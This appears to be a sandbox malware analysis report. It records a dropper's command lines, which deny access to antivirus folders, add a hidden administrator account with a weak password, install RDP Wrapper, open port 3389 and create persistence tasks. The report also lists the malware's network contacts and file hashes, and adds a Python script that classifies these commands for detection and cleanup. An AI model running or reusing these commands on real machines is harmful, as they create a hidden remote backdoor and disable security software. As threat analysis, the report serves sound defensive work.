icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-288689378-876327943-217641628-191327148614229571531383836086620444591577834264"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
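The process list above records one installation sequence: icacls deny ACEs placed on the directories of installed security products (for the current user, shown as `Admin` in the icacls.exe children, and for `system`), a local account `John` added to the Remote Desktop Users group under its Russian, English, Spanish and Polish names (plus the Russian Remote Management Users group), RDP Wrapper installed from C:\rdp, TCP/3389 opened in the firewall, the account hidden from the logon screen through SpecialAccounts\UserList, password expiry disabled, the drop folders set hidden+system, and two scheduled tasks for persistence. The script below is an added example written for this report, not sandbox output: it classifies such command lines into those technique buckets and lists the directories whose ACLs need repair (`icacls <path> /remove:d <principal>`). The technique names and regular expressions are my own choices; the sample lines are copied from the list above, plus one constructed benign line.

```python
"""Classify sandbox process command lines by the techniques seen in this
detonation. Added example for this report; not part of the sandbox output.
Technique labels and regexes are the author's own; sample lines are copied
from the report's process list plus one constructed benign line."""
import re
from collections import defaultdict

# Constructed sample: one recorded command line per technique family.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)',
    r'icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)',
    r'icacls c:\programdata\Malwarebytes /deny Admin:(F)',
    r'net localgroup "Пользователи удаленного рабочего стола" John /add',
    r'C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add',
    r'net accounts /maxpwage:unlimited',
    r'"RDPWInst.exe" -i -o',
    r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow',
    r'reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1',
    r'attrib +s +h "C:\rdp"',
    r'TASKKILL /IM P.exe /T /F',
    r'C:\Windows\system32\svchost.exe -k netsvcs',  # constructed benign line
]

# Localized names of the built-in remote-access groups the dropper tries in
# turn; all of them appear in the process list (lower-cased for lookup).
REMOTE_ACCESS_GROUPS = {
    "remote desktop users",
    "пользователи удаленного рабочего стола",  # ru: Remote Desktop Users
    "пользователи удаленного управления",      # ru: Remote Management Users
    "usuarios de escritorio remoto",           # es: Remote Desktop Users
    "uzytkownicy pulpitu zdalnego",            # pl: Remote Desktop Users
}

_TARGET = r'(?:"([^"]+)"|(\S+))'  # a quoted or bare path/name argument

ICACLS_DENY = re.compile(r'\bicacls\s+' + _TARGET + r'\s+/deny\s+([^:\s]+):(?:\([A-Z]+\))+', re.I)
LOCALGROUP_ADD = re.compile(r'\bnet1?\s+localgroup\s+' + _TARGET + r'\s+(\S+)\s+/add\b', re.I)
HIDE_ACCOUNT = re.compile(r'SpecialAccounts\\UserList"?\s+/v\s+"?([^"\s]+)"?\s+/t\s+REG_DWORD\s+/d\s+0\b', re.I)
FIREWALL_RDP = re.compile(r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b.*\baction=allow\b', re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b.*?/TN\s+"([^"]+)".*?/TR\s+"([^"]+)"(?:.*?/SC\s+(\S+))?', re.I)
RDPWRAP = re.compile(r'RDPWInst(?:\.exe)?"?\s+(-\S+(?:\s+-\S+)*)', re.I)
NO_PW_EXPIRY = re.compile(r'\bnet1?\s+accounts\s+/maxpwage:unlimited\b', re.I)
ATTRIB_HIDE = re.compile(r'\battrib\s+((?:\+[hs]\s+)+)' + _TARGET, re.I)
TASKKILL = re.compile(r'\btaskkill\s+/IM\s+(\S+)', re.I)


def _target(m, first=1):
    """Return whichever of the two _TARGET capture groups matched."""
    return m.group(first) or m.group(first + 1)


def classify(cmdline):
    """Return a list of (technique, detail) findings for one command line."""
    findings = []
    if m := ICACLS_DENY.search(cmdline):
        # The cmd.exe /c wrapper still carries the unexpanded %username%;
        # the icacls.exe child shows the resolved account (Admin in this run).
        findings.append(("acl_deny", f"{m.group(3)} denied on {_target(m)}"))
    if m := LOCALGROUP_ADD.search(cmdline):
        group = _target(m)
        kind = "rdp_group_add" if group.lower() in REMOTE_ACCESS_GROUPS else "localgroup_add"
        findings.append((kind, f"{m.group(3)} -> {group}"))
    if m := HIDE_ACCOUNT.search(cmdline):
        findings.append(("hidden_account", m.group(1)))
    if FIREWALL_RDP.search(cmdline):
        findings.append(("firewall_allow_rdp", "tcp/3389 inbound allowed"))
    if m := SCHTASKS_CREATE.search(cmdline):
        findings.append(("scheduled_task", f"{m.group(1)} -> {m.group(2)} ({m.group(3) or '?'})"))
    if m := RDPWRAP.search(cmdline):
        findings.append(("rdp_wrapper", m.group(1)))
    if NO_PW_EXPIRY.search(cmdline):
        findings.append(("password_never_expires", "maxpwage unlimited"))
    if m := ATTRIB_HIDE.search(cmdline):
        findings.append(("hide_files", _target(m, 2)))
    if m := TASKKILL.search(cmdline):
        findings.append(("kill_process", m.group(1)))
    return findings


def summarize(cmdlines):
    """Group findings by technique across a whole process list."""
    report = defaultdict(list)
    for line in cmdlines:
        for technique, detail in classify(line):
            report[technique].append(detail)
    return dict(report)


def denied_paths(cmdlines):
    """Directories poisoned with deny ACEs; each needs
    `icacls <path> /remove:d <principal>` during cleanup."""
    return {_target(m) for line in cmdlines if (m := ICACLS_DENY.search(line))}


if __name__ == "__main__":
    for technique, details in sorted(summarize(SAMPLE_CMDLINES).items()):
        print(f"{technique}:")
        for detail in details:
            print(f"  {detail}")
    print("ACLs to repair:", sorted(denied_paths(SAMPLE_CMDLINES)))
```

Match on the icacls.exe and net1.exe children rather than the cmd.exe and net.exe wrappers when hunting in real telemetry: the wrapper lines carry the unexpanded `%username%`, while the children show the resolved principal and the group name actually used.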
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | | tcp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
Files
memory/1704-54-0x00000000755B1000-0x00000000755B3000-memory.dmp
\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
memory/1888-56-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
memory/1880-61-0x0000000000000000-mapping.dmp
C:\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
C:\programdata\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
